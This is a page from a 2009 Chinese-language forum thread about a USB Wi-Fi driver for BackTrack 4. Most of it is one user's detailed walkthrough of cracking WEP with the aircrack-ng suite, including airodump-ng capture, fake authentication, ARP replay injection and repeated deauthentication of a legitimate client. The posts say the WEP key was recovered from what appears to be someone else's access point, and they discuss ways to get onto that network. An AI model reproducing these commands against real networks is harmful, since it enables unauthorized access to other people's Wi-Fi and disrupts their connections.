nan_jh 发表于 2009-6-6 17:58

忘记感谢LZ了,真是有问必回了,人很厚道,仅从这方面看,LZ人真不错,有机会去天津会您!

nan_jh 发表于 2009-6-6 17:59

对了,您那《恋摊》的文笔也不错

nan_jh 发表于 2009-6-6 18:00

对了,您那《恋摊》的文笔也不错

OnE0120 发表于 2009-6-6 18:25

我只能来顶一下....收藏备用啊

wwelcome 发表于 2009-6-7 13:07

忘记感谢LZ了,真是有问必回了,人很厚道,仅从这方面看,LZ人真不错,有机会去天津会您!
nan_jh 发表于 2009-6-6 17:58 http://forum.anywlan.com/images/common/back.gif


互相学习吧.

slovep 发表于 2009-6-23 14:01

hehe我很菜 相同的卡 VM下载哪个版本官方主页上有很多版本不知道下哪个好请给个链接谢谢

wwelcome 发表于 2009-6-24 15:20

VMware Workstation(6.5.2)

地址:http://www.vmware.com/download/ws/

hiyaya123 发表于 2009-6-24 17:31

问一下:信号不是很好,30%,aireplay-ng -1 成功,aireplay-ng -2 发包攻击也成功,但是一只能持续一小会儿,#DATA包增长到几十或几百的时候,就不动了,DOWN掉了,再用airodump-ng 时一片空白,只能把USB网卡断开连接后再重新连接。次次都是这样。

比较烦恼,不知道是什么原因?有什么解决办法?

wwelcome 发表于 2009-6-24 21:19

我有时也会遇到这种情况,没办法,还是支持得不是很好。

hiyaya123 发表于 2009-6-25 17:03

楼主的回复堪比及时雨,谢谢。
今天中午我又试了,信号30%,信号质量60%,信号比较稳定。
为了照顾比我菜的初学者,过程写详细一点:
先还是尝试无客户端破解
airmon-ng start wlan0 6   开启监听
airodump-ng -w test --channel 6 mon0 抓包
aireplay-ng -1 0 -a ap_mac -h my_mac mon0 伪连接成功
aireplay-ng -2 -p 0841 -b ap_mac -h my_mac mon0 攻击
抓到了包,按Y确认,自动攻击开始,但是只发了几百次包就停了。
今天中午跟以前相比,好的是airodump还在继续工作,网络没有down掉。原因不知道。为了保持网络连接的稳定,我曾使用过 ifconfig wlan0 rate 24M fixed 和 ifconfig mon0 rate 24M fixed ,把网卡连接速率限制在24M,也不知道是否起作用。
继续尝试,加参数 -x 128 限制每秒攻击次数
aireplay-ng -2 -f -p 0841 -e TP-LINK-b ap_mac -h my_mac -x 128 mon0
抓包成功,按Y确认开始攻击......仍然不行。

包不好抓,每次抓的包aireplay-ng 都保存为一个.cap文件。用这个文件好像可以免除每次都去等待抓包。加参数-r 读取上次所抓的包。不知道这样做是否正确。
aireplay-ng -2 -f -p 0841 -e TP-LINK-b ap_mac -h my_mac -r replay_src-0625-103838.cap -x 128 mon0
按Y确定攻击,这样一来,发包攻击没有停止了,一直在持续。但是#data一直不见涨。可见无效。
用aireplay-ng -9 mon0 测试注入,现在不行了。刚开始的时候是可以的,现在显示不行了。再运行aireplay-ng -1 显示open system。对了,在这过程中我还尝试了有客户端的 aireplay-ng -3 攻击.

我不知道为什么这样。不过我还是继续尝试。
发现在aireplay-ng -2 中得到的攻击包中,第一行是AP的MAC,第二行是ff:ff:ff:ff:ff:ff,第三行好像意思是目标mac,不是我的网卡MAC,显然应该是别人的正常使用的客户端MAC。用kismet,按空格,s , c,c 后,显示的客户端列表中就有这个目标MAC。我觉得我应该用有客户端的WEP攻击。

后来我觉得如果真的无客户端的话,是无法完成攻击的,因为当这个目标MAC消失之后,我用aireplay-ng -2 攻击的时候,监听了几千上万包也没有得到可以用于攻击的包,也就是没有得到按Y键确认攻击的机会。

既然这个AP有客户端,我决定尝试有客户端攻击。
重启BT4,全新开始。
airmon-ng start wlan0 6 开监听
airodump-ng -w test --channel 6 mon0 抓包
aireplay-ng -3 -b AP_MAC -h 客户端_MAC mon0 开始有客户端攻击,
在此之前不需要再 aireplay-ng -1了?我好像是这样做的。记不太清楚,以后再确认一下。
此时攻击没有反应。因为客户端那边好像没有什么动作,#data没有动静。
开新窗口,
aireplay-ng -0 10 -b AP_MAC -h 客户户_mac mon0 让正常客户端掉线10次,以得到攻击包。
然后,好家伙,前一个 -3 攻击的窗口猛动起来,airodump-ng 窗口里#data猛涨,
才一分钟不到,就已经20000了。
然后用 aircrack-ng test-01.cap ,解出WEP密码 : 13 99 03 33 14

有客户端攻击如此简单高效,为什么还要做无客户端攻击呢?如果真的完全没有客户端,那aireplay-ng -2能得到用于攻击的包吗?

无客户端攻击失败,有客户端攻击成功。大家可以多尝试有客户端攻击。
airodump-ng 中没有显示客户端活动的话,用kismet也可以发现客户端的MAC,除非对方关了电脑没有上网。或者用aireplay-ng -2抓到的攻击包中也可能有客户端的MAC,但也可能是别的,我以前做攻击的时候也有发现第一行和第三行都是AP的MAC。这种情况或许才适合做无客户端攻击吧?

然而事情到这里并没有结束。虽然得到了WEP密码是 13 99 03 33 14 ,但是在WINXP下用这个密码连网,结果无法从AP那里得到IP,显示网络受限制或无连接。看这个WEP密码不象是ASCII啊,好像是十六进制的,谁能告诉我怎么回事?难道是AP的主人禁止了无线路由的DHCP服务?看来我只有再想办法得到AP的IP了。

wwelcome 发表于 2009-6-25 21:05

首先感谢你的测试……

真正意义上的无客户端攻击(拿自己的路由做的测试,确保真正无客户端):截止到目前为止,我一次都没有成功过。究其原因:没有合法的ARP包出现,这里的合法:是用正确的密码连接路由器,用不正确的密码尝试连接路由器也会得到ARP,但用此包攻击的话DATA不会增长。

一点不成熟的建议:在尝试攻击某路由器前,先在WIN下用Network Stumbler找到一个比较好的信号点,此点:信号稳定且强度相对较高,找到这点后,在切换到攻击平台下,进行……

欢迎交流:http://blog.163.com/prince_vegeta
那里,我可以更快地响应。

wwelcome 发表于 2009-6-25 21:07

密码直接输入:1399033314

先用Network Stumble找到那点,再进行连接。
页: 1 2 3 4 5 6 7 8 9 [10] 11 12 13 14 15 16 17 18 19
查看完整版本: TL-WN322G+ for bt4-beta Driver(LZM)